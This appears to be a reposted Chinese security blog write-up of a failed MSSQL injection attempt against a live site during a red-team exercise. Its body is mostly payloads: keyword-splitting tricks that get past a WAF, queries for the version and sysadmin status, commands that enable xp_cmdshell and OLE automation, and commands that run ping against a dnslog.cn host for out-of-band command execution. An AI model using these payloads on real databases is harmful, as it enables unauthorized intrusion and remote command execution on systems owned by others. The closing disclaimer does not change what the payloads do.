因为这篇笔记记录的是朋友在HW期间的一个站点,所以全程无截图,怕给漏点喽,大家将就着看下吧,学习一下文中的绕过方式。
0x01 前言
朋友@Sin在某次HW期间遇到的这么一个MSSQL注入点案例,但因目标主机上有一个不知名WAF过滤了and、select、exec、declare等关键字,最终没能帮他成功绕过,不过在测试过程还是挺有意思的,简单记录一下,说不定以后啥时候还能用上。
0x02 正文
anaandndd db_name()>0--+
anaandndd 1=(selecseselectlectt @@version)--+
anaandndd 1=(selecseselectlectt is_srvrolemember('sysadmin'))--+
exeeexec xec c sp_configure 'show advanced options', 1;--+
RECONFIGURE;--+
exeeexec xec c sp_configure 'xp_cmdshell', 1;--+
RECONFIGURE;--+
exeeexec xec c master..xp_cmdshell "cmd /c ping ******.dnslog.cn"--+
绕过exec关键字后成功开启xp_cmdshell存储过程,但在执行命令时还是被拦截了,输入任何命令都会出现以下提示,怀疑是可能还存在什么其他的安全防护设备。
Timeout时间已到.在操作完成之前超时时间已过或服务器未响应。
(4) declare、exec关键字绕过
exeeexec xec c sp_configure 'show advanced options', 1;--+
RECONFIGURE WITH OVERRIDE;--+
exeeexec xec c sp_configure 'Ole Automation Procedures', 1;--+
RECONFIGURE WITH OVERRIDE;--+
exeeexec xec c sp_configure 'show advanced options', 0;--+
declarddeclare eclare e int exeeexec xec c sp_oacreate 'wscript.shell', output exeeexec xec c sp_oamethod ,'run',null,'c:windowssystem32ping.exe ******.dnslog.cn'--+
找不到存储过程 'sp_oa'。尚未为此批处理命令成功调用 sp_OACreate
原文始发于微信公众号(Hack分享吧):记一次失败的MSSQL注入绕过
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论